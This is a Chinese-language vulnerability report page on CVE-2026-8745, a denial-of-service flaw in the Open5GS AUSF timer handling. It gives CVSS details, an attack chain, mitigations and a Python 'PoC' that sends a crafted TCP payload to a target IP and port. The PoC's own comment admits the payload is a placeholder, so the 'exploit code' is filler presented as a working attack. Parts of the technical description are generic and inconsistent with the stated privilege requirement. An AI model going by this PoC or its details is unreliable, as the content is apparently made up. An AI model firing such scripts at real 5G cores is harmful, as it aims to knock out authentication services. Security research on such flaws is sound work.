IPBUF安全漏洞报告
English
CVE-2026-8745 CVSS 4.3 中危

CVE-2026-8745 Open5GS拒绝服务漏洞

披露日期: 2026-05-17
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-8745
漏洞类型
拒绝服务
CVSS评分
4.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Open5GS

相关标签

拒绝服务Open5GS5GDoSCVE-2026-8745远程漏洞

漏洞概述

Open5GS是一款开源的5G核心网实现。在Open5GS 2.7.7及之前的版本中,AUSF组件的库文件/src/ausf/nausf-handler.c中的ogs_timer_add函数存在漏洞。攻击者可远程操纵该函数导致系统崩溃或资源耗尽,从而引发拒绝服务。目前利用代码已公开,官方尚未修复,风险较高。

技术细节

该漏洞源于Open5GS AUSF(认证服务器功能)组件在处理定时器时的逻辑缺陷。问题位于/src/ausf/nausf-handler.c文件的ogs_timer_add函数中。由于该函数对定时器操作的边界条件处理不当,攻击者可以通过网络发送特制的恶意数据包触发该漏洞。成功利用后,可导致定时器管理混乱,进而耗尽系统资源或导致服务进程异常终止。由于攻击向量为网络,无需复杂权限且无需用户交互,攻击者可轻易使目标Open5GS服务瘫痪。

攻击链分析

STEP 1
侦察
攻击者扫描网络以识别Open5GS AUSF组件的开放端口和服务版本。
STEP 2
漏洞利用
攻击者向目标AUSF服务发送特制的数据包,触发ogs_timer_add函数中的缺陷。
STEP 3
拒绝服务
目标系统因定时器逻辑错误导致资源耗尽或进程崩溃,无法提供正常的5G认证服务。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
#!/usr/bin/env python3 # PoC for CVE-2026-8745 (Open5GS DoS) # This script attempts to trigger the ogs_timer_add vulnerability in AUSF. import socket import sys def send_exploit(target_ip, target_port): try: print(f"[*] Sending payload to {target_ip}:{target_port}...") # Placeholder for actual malformed packet structure specific to AUSF payload = b"\x00\x00\x00\x01" + b"\x41" * 100 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(5) s.connect((target_ip, target_port)) s.send(payload) print("[+] Payload sent. Check if service has crashed.") s.close() except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) != 3: print("Usage: python3 cve-2026-8745.py <IP> <PORT>") sys.exit(1) send_exploit(sys.argv[1], int(sys.argv[2]))

影响范围

Open5GS <= 2.7.7

防御指南

临时缓解措施
由于官方尚未发布补丁,建议用户限制对AUSF组件的网络访问,仅允许可信的NRF或UE网元连接。同时,应部署入侵检测系统(IDS)监控异常流量,并配置服务监控脚本以便在服务崩溃时自动重启。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表